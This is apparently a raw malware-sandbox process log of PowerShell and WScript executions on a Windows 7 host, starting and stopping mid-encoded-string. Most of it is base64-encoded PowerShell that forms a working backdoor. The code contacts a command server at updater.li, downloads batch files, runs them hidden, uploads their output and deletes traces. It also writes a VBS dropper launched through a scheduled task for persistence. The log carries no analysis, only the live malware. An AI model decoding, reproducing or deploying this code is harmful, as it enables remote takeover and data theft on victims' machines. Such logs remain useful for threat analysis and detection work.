ACgAgACAAIAAgACAAIAAgACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAGIAYQB0ACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAG0AYQBpAG4AOwANAAoAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2896"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand JABNAFkASABPAE0ARQAgAD0AIAAkAEUAbgB2ADoAUAB1AGIAbABpAGMAKwAiAFwATABpAGIAcgBhAHIAaQBlAHMAXABSAGUAYwBvAHIAZABlAGQAVABWAFwAIgA7AA0ACgAkAFMARQBSAFYARQBSACAAPQAgACIAaAB0AHQAcAA6AC8ALwB1AHAAZABhAHQAZQByAC4AbABpAC8AaQBuAGQAZQB4AC4AYQBzAHAAeAA/AGkAZAA9ADEAMAA2ADcANgA2ADcANgA3ADYAXAAiADsADQAKACQAVQBQACAAPQAgACIAdQBwAFwAIgA7AA0ACgAkAEQATgAgAD0AIAAiAGQAbgBcACIAOwANAAoAJABUAFAAIAA9ACAAIgB0AHAAXAAiADsADQAKACQAVQBQAEwASwAgAD0AIAAiAHUAcABsAG8AYwBrACIAOwANAAoAJABEAE4ATABLACAAPQAgACIAZAB3AG4AbABvAGMAawAiADsADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAaQBuAGsALAAgACQAcABhAHQAaAApAA0ACgB7AA0ACgAJACQAdwBjACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwANAAoACQAkAHcAYwAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgACQAdAByAHUAZQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAnACwAJwAqAC8AKgAnACkAOwANAAoACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAGkAYwByAG8AcwBvAGYAdAAgAEIASQBUAFMALwA3AC4ANwAnACkAOwANAAoACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQQBjAGMAZQBwAHQALQBMAGEAbgBnAHUAYQBnAGUAJwAsACcAZQBuAC0AVQBTACwAZQBuADsAcQA9ADAALgA1ACcAKQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAtAEUAbgBjAG8AZABpAG4AZwAnACwAJwBnAHoAaQBwACwAIABkAGUAZgBsAGEAdABlACcAKQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBSAGUAZgBlAHIAZQByACcALAAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGcAbwBvAGcAbABlAC4AYwBvAG0AJwApADsADQAKAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAFAAcgBhAGcAbQBhACcALAAnAG4AbwAtAGMAYQBjAGgAZQAnACkAOwANAAoACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQwBhAGMAaABlAC0AQwBvAG4AdAByAG8AbAAnACwAJwBuAG8ALQBjAGEAYwBoAGUAJwApADsADQAKAAkAJAByACAAPQAgAEcAZQB0AC0AUgBhAG4AZABvAG0AOwANAAoACQAkAGYAaQBsAGUAIAA9ACAAKAAkAHAAYQB0AGgALgBUAHIAaQBtAEUAbgBkACgAJwBcACcAKQApACsAJwBcACcAKwAkAHIAOwANAAoACQB0AHIAeQANAAoACQB7AA0ACgAJAAkAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABpAG4AawAsACQAZgBpAGwAZQApADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgAJAHsADQAKAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAUgBlAGYAZQByAGUAcgAnACwAJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBnAG8AbwBnAGwAZQAuAGMAbwBtACcAKQA7AA0ACgAJAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAEEAYwBjAGUAcAB0ACcALAAnACoALwAqACcAKQA7AA0ACgAJAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAFsAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcAXQAgAD0AIAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAzADsAIABXAGkAbgA2ADQAOwAgAHgANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7AA0ACgAJAAkADQAKAAkACQB0AHIAeQANAAoACQAJAHsADQAKAAkACQAJACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAaQBuAGsALAAkAGYAaQBsAGUAKQA7AA0ACgAJAAkAfQANAAoACQAJAGMAYQB0AGMAaAANAAoACQAJAHsADQAKAAkACQAJAHQAaAByAG8AdwAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEUAeABjAGUAcAB0AGkAbwBuAF0AIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwANAAoACQAJAH0ADQAKAAkAfQANAAoACQAkAGMAZAAgAD0AIAAkAHcAYwAuAFIAZQBzAHAAbwBuAHMAZQBIAGUAYQBkAGUAcgBzAFsAJwBDAG8AbgB0AGUAbgB0AC0ARABpAHMAcABvAHMAaQB0AGkAbwBuACcAXQA7AA0ACgAJACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAYwBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGMAZAAuAEkAbgBkAGUAeABPAGYAKAAnAGYAaQBsAGUAbgBhAG0AZQA9ACcAKQArADkAKQA7AA0ACgAJACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGYAaQBsAGUAbgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC0AJwAsACcALwAnACkAKQApADsADQAKAAkAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAKAAoACQAcABhAHQAaAAuAFQAcgBpAG0ARQBuAGQAKAAnAFwAJwApACkAKwAnAFwAJwArACQAZgBpAGwAZQBuAGEAbQBlACkAIAAtAFYAYQBsAHUAZQAgACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABmAGkAbABlACkAKQApACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlADsADQAKAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABmAGkAbABlACAALQBGAG8AcgBjAGUAOwANAAoACQByAGUAdAB1AHIAbgAgACgAKAAkAHAAYQB0AGgALgBUAHIAaQBtAEUAbgBkACgAJwBcACcAKQApACsAJwBcACcAKwAkAGYAaQBsAGUAbgBhAG0AZQApADsADQAKAH0ADQAKAA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEQAbwB3AG4AVABoAGUAbQBBAGwAbAANAAoAewANAAoACQBpAGYAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAE0AWQBIAE8ATQBFACQARABOAEwASwApACkADQAKAAkAewANAAoACQAJAE4AZQB3AC0ASQB0AGUAbQAgACQATQBZAEgATwBNAEUAJABEAE4ATABLACAALQB0AHkAcABlACAAZgBpAGwAZQA7AA0ACgAJAAkAJABpACAAPQAgADEAOwANAAoACQAJAHcAaABpAGwAZQAoACQAaQAgAC0AbABlACAAMwApAA0ACgAJAAkAewANAAoACQAJAAkAdAByAHkADQAKAAkACQAJAHsADQAKAAkACQAJAAkARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAIAAoACQAUwBFAFIAVgBFAFIAKwAnAGQAJwApACAAKAAkAE0AWQBIAE8ATQBFACsAJABEAE4AKQA7AA0ACgAJAAkACQB9AA0ACgAJAAkACQBjAGEAdABjAGgADQAKAAkACQAJAHsADQAKAAkACQAJAAkAYgByAGUAYQBrADsADQAKAAkACQAJAH0ADQAKAAkACQAJACQAaQArACsAOwANAAoACQAJAH0ADQAKAAkACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQARABOAEwASwAgAC0ARgBvAHIAYwBlADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAVQBwAGwAbwBhAGQARgBpAGwAZQBSAGUAbQBvAHYAZQAoACQAZgBpAGwAZQApAA0ACgB7AA0ACgAJAGkAZgAoACgARwBlAHQALQBJAHQAZQBtACAAKAAkAGYAaQBsAGUAKQApAC4AbABlAG4AZwB0AGgAIAAtAGcAdAAgADAAKQANAAoACQB7AA0ACgAJAAkAJAB3AGMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAJAAkAJAB3AGMALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIAAkAHQAcgB1AGUAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAnACwAJwAqAC8AKgAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAQgBJAFQAUwAvADcALgA3ACcAKQA7AA0ACgAJAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAEEAYwBjAGUAcAB0AC0ATABhAG4AZwB1AGEAZwBlACcALAAnAGUAbgAtAFUAUwAsAGUAbgA7AHEAPQAwAC4ANQAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAtAEUAbgBjAG8AZABpAG4AZwAnACwAJwBnAHoAaQBwACwAIABkAGUAZgBsAGEAdABlACcAKQA7AA0ACgAJAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAFIAZQBmAGUAcgBlAHIAJwAsACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AZwBvAG8AZwBsAGUALgBjAG8AbQAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBQAHIAYQBnAG0AYQAnACwAJwBuAG8ALQBjAGEAYwBoAGUAJwApADsADQAKAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQwBhAGMAaABlAC0AQwBvAG4AdAByAG8AbAAnACwAJwBuAG8ALQBjAGEAYwBoAGUAJwApADsADQAKAAkACQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABmAGkAbABlACkAKQApACAAfAAgAE8AdQB0AC0ARgBpAGwAZQAgACQAZgBpAGwAZQAgAC0ARQBuAGMAbwBkAGkAbgBnACAARABlAGYAYQB1AGwAdAA7AA0ACgAJAAkAJABpAD0AMQA7AA0ACgAJAAkAdwBoAGkAbABlACgAJABpACAALQBsAGUAIAAzACkADQAKAAkACQB7AA0ACgAJAAkACQB0AHIAeQANAAoACQAJAAkAewANAAoACQAJAAkACQAkAHcAYwAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAkAFMARQBSAFYARQBSACsAJwB1ACcALAAkAGYAaQBsAGUAKQA7AA0ACgAJAAkACQAJAGIAcgBlAGEAawA7AA0ACgAJAAkACQB9AA0ACgAJAAkACQBjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgAJAAkACQB7AA0ACgAJAAkACQAJACQAaQArACsAOwANAAoACQAJAAkACQBjAG8AbgB0AGkAbgB1AGUAOwANAAoACQAJAAkAfQANAAoACQAJAH0ADQAKAAkACQANAAoACQAJAGkAZgAgACgAJABpACAALQBlAHEAIAA0ACkADQAKAAkACQB7AA0ACgAJAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAUgBlAGYAZQByAGUAcgAnACwAJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBnAG8AbwBnAGwAZQAuAGMAbwBtACcAKQA7AA0ACgAJAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQQBjAGMAZQBwAHQAJwAsACcAKgAvACoAJwApADsADQAKAAkACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwBbACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnAF0AIAA9ACAAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMwA7ACAAVwBpAG4ANgA0ADsAIAB4ADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwANAAoACQAJAAkAJABpACAAPQAgADEAOwANAAoACQAJAAkAdwBoAGkAbABlACgAJABpACAALQBsAGUAIAAzACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAdAByAHkADQAKAAkACQAJAAkAewANAAoACQAJAAkACQAJACQAdwBjAC4AVQBwAGwAbwBhAGQARgBpAGwAZQAoACQAUwBFAFIAVgBFAFIAKwAnAHUAJwAsACQAZgBpAGwAZQApADsADQAKAAkACQAJAAkACQBiAHIAZQBhAGsAOwANAAoACQAJAAkACQB9AA0ACgAJAAkACQAJAGMAYQB0AGMAaAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEUAeABjAGUAcAB0AGkAbwBuAF0ADQAKAAkACQAJAAkAewANAAoACQAJAAkACQAJACQAaQArACsAOwANAAoACQAJAAkACQAJAGMAbwBuAHQAaQBuAHUAZQA7AA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAdwBhAGkAdABmAG8AcgAgAHUAcABsAHAAcgBvAGMAIAAvAFQAIAAxADsADQAKAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABmAGkAbABlADsADQAKAH0ADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAVQBwAFQAaABlAG0AQQBsAGwADQAKAHsADQAKAAkAaQBmACgALQBuAG8AdAAoAFQAZQBzAHQALQBQAGEAdABoACAAJABNAFkASABPAE0ARQAkAFUAUABMAEsAKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVQBQAEwASwAgAC0AdAB5AHAAZQAgAGYAaQBsAGUAOwANAAoACQAJAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVQBQACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAB7AHQAcgB5AHsAVQBwAGwAbwBhAGQARgBpAGwAZQBSAGUAbQBvAHYAZQAgACgAJABfAC4ARgB1AGwAbABOAGEAbQBlACkAfQBjAGEAdABjAGgAewBjAG8AbgB0AGkAbgB1AGUAfQB9ADsADQAKAAkACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVQBQAEwASwAgAC0ARgBvAHIAYwBlADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABEAG8AdwBuAGwAbwBhAGQARQB4AGUAYwB1AHQAZQANAAoAewANAAoACQB0AHIAeQANAAoACQB7AA0ACgAJAAkAJABiAGEAdABmAGkAbABlACAAPQAgAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACAAKAAkAFMARQBSAFYARQBSACsAJwBiACcAKQAgACgAJABNAFkASABPAE0ARQArACQARABOACkAOwANAAoACQB9AA0ACgAJAGMAYQB0AGMAaAANAAoACQB7AA0ACgAJAAkAcgBlAHQAdQByAG4AOwANAAoACQB9AA0ACgAJACQAYQByAGcAcwA9ACIALwBjACAAIgArACQAYgBhAHQAZgBpAGwAZQArACIAIAA+ACAAIgArACQAYgBhAHQAZgBpAGwAZQArACIALgB0AHgAdAAiADsADQAKAAkAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAFcAYQBpAHQAIAAtAEYAaQBsAGUAUABhAHQAaAAgAGMAbQBkACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAYQByAGcAcwA7AA0ACgAJAFUAcABsAG8AYQBkAEYAaQBsAGUAUgBlAG0AbwB2AGUAKAAkAGIAYQB0AGYAaQBsAGUAKwAnAC4AdAB4AHQAJwApADsADQAKAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGIAYQB0AGYAaQBsAGUAKQA7AA0ACgB9AA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEkAbgBpAHQAQwBoAGUAYwBrAA0ACgB7AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABEAE4AKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQARABOACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABVAFAAKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVQBQACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABUAFAAKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVABQACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgB9AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABBAGwAaQB2AGUADQAKAHsADQAKAAkASQBuAGkAdABDAGgAZQBjAGsAOwANAAoACQBEAG8AdwBuAFQAaABlAG0AQQBsAGwAOwANAAoACQBEAG8AdwBuAGwAbwBhAGQARQB4AGUAYwB1AHQAZQA7AA0ACgAJAFUAcABUAGgAZQBtAEEAbABsADsADQAKAH0ADQAKAA0ACgANAAoAQQBsAGkAdgBlADsAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3252"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "&{Start-Sleep -s 1}"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exef77ee804de304f7c3ea6b87824684b33.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3340C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\RecordedTV\backup1.vbs"C:\Windows\System32\WScript.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3484"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "&{Start-Sleep -s 2;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzXFJlY29yZGVkVFZcIg0KDQpEbkVDbWQxPSJwb3dlcnNoZWxsIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1GaWxlICImSE9NRSYiRG5FMS5wczEiDQpDcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5SdW4gRG5FQ21kMSwwDQoNCkRuc0NtZDE9InBvd2Vyc2hlbGwgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUZpbGUgIiZIT01FJiJEblMxLnBzMSINCkNyZWF0ZU9iamVjdCgiV1NjcmlwdC5TaGVsbCIpLlJ1biBEbnNDbWQxLDA=')); Set-Content 'C:\Users\Public\Libraries\RecordedTV\backup1.vbs' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JE1ZSE9NRSA9ICRFbnY6UHVibGljKyJcTGlicmFyaWVzXFJlY29yZGVkVFZcIjsNCiRTRVJWRVIgPSAiaHR0cDovL3VwZGF0ZXIubGkvaW5kZXguYXNweD9pZD1fX1wiOw0KJFVQID0gInVwXCI7DQokRE4gPSAiZG5cIjsNCiRUUCA9ICJ0cFwiOw0KJFVQTEsgPSAidXBsb2NrIjsNCiRETkxLID0gImR3bmxvY2siOw0KDQoNCmZ1bmN0aW9uIERvd25sb2FkRmlsZSgkbGluaywgJHBhdGgpDQp7DQoJJHdjID0gbmV3LW9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsNCgkkd2MuVXNlRGVmYXVsdENyZWRlbnRpYWxzID0gJHRydWU7DQoJJHdjLkhlYWRlcnMuYWRkKCdBY2NlcHQnLCcqLyonKTsNCgkkd2MuSGVhZGVycy5hZGQoJ1VzZXItQWdlbnQnLCdNaWNyb3NvZnQgQklUUy83LjcnKTsNCgkkd2MuSGVhZGVycy5hZGQoJ0FjY2VwdC1MYW5ndWFnZScsJ2VuLVVTLGVuO3E9MC41Jyk7DQoJJHdjLkhlYWRlcnMuYWRkKCdBY2NlcHQtRW5jb2RpbmcnLCdnemlwLCBkZWZsYXRlJyk7DQoJJHdjLkhlYWRlcnMuYWRkKCdSZWZlcmVyJywnaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbScpOw0KCSR3Yy5IZWFkZXJzLmFkZCgnUHJhZ21hJywnbm8tY2FjaGUnKTsNCgkkd2MuSGVhZGVycy5hZGQoJ0NhY2hlLUNvbnRyb2wnLCduby1jYWNoZScpOw0KCSRyID0gR2V0LVJhbmRvbTsNCgkkZmlsZSA9ICgkcGF0aC5UcmltRW5kKCdcJykpKydcJyskcjsNCgl0cnkNCgl7DQoJCSR3Yy5Eb3dubG9hZEZpbGUoJGxpbmssJGZpbGUpOw0KCX0NCgljYXRjaCBbU3lzdGVtLk5ldC5XZWJFeGNlcHRpb25dDQoJew0KCQkkd2MuSGVhZGVycy5hZGQoJ1JlZmVyZXInLCdodHRwczovL3d3dy5nb29nbGUuY29tJyk7DQoJCSR3Yy5IZWFkZXJzLmFkZCgnQWNjZXB0JywnKi8qJyk7DQoJCSR3Yy5IZWFkZXJzWydVc2VyLUFnZW50J10gPSAnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4zOyBXaW42NDsgeDY0OyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbyc7DQoJCQ0KCQl0cnkNCgkJew0KCQkJJHdjLkRvd25sb2FkRmlsZSgkbGluaywkZmlsZSk7DQoJCX0NCgkJY2F0Y2gNCgkJew0KCQkJdGhyb3cgW1N5c3RlbS5OZXQuV2ViRXhjZXB0aW9uXSAkXy5FeGNlcHRpb24uVG9TdHJpbmcoKTsNCgkJfQ0KCX0NCgkkY2QgPSAkd2MuUmVzcG9uc2VIZWFkZXJzWydDb250ZW50LURpc3Bvc2l0aW9uJ107DQoJJGZpbGVuYW1lID0gJGNkLlN1YnN0cmluZygkY2QuSW5kZXhPZignZmlsZW5hbWU9JykrOSk7DQoJJGZpbGVuYW1lID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZmlsZW5hbWUuUmVwbGFjZSgnLScsJy8nKSkpOw0KCVNldC1Db250ZW50IC1QYXRoICgoJHBhdGguVHJpbUVuZCgnXCcpKSsnXCcrJGZpbGVuYW1lKSAtVmFsdWUgKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoKEdldC1Db250ZW50IC1QYXRoICRmaWxlKSkpIC1FbmNvZGluZyBCeXRlOw0KCVJlbW92ZS1JdGVtICRmaWxlIC1Gb3JjZTsNCglyZXR1cm4gKCgkcGF0aC5UcmltRW5kKCdcJykpKydcJyskZmlsZW5hbWUpOw0KfQ0KDQoNCg0KZnVuY3Rpb24gRG93blRoZW1BbGwNCnsNCglpZigtbm90KFRlc3QtUGF0aCAkTVlIT01FJEROTEspKQ0KCXsNCgkJTmV3LUl0ZW0gJE1ZSE9NRSRETkxLIC10eXBlIGZpbGU7DQoJCSRpID0gMTsNCgkJd2hpbGUoJGkgLWxlIDMpDQoJCXsNCgkJCXRyeQ0KCQkJew0KCQkJCURvd25sb2FkRmlsZSAoJFNFUlZFUisnZCcpICgkTVlIT01FKyRETik7DQoJCQl9DQoJCQljYXRjaA0KCQkJew0KCQkJCWJyZWFrOw0KCQkJfQ0KCQkJJGkrKzsNCgkJfQ0KCQlSZW1vdmUtSXRlbSAkTVlIT01FJEROTEsgLUZvcmNlOw0KCX0NCn0NCg0KDQoNCmZ1bmN0aW9uIFVwbG9hZEZpbGVSZW1vdmUoJGZpbGUpDQp7DQoJaWYoKEdldC1JdGVtICgkZmlsZSkpLmxlbmd0aCAtZ3QgMCkNCgl7DQoJCSR3YyA9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7DQoJCSR3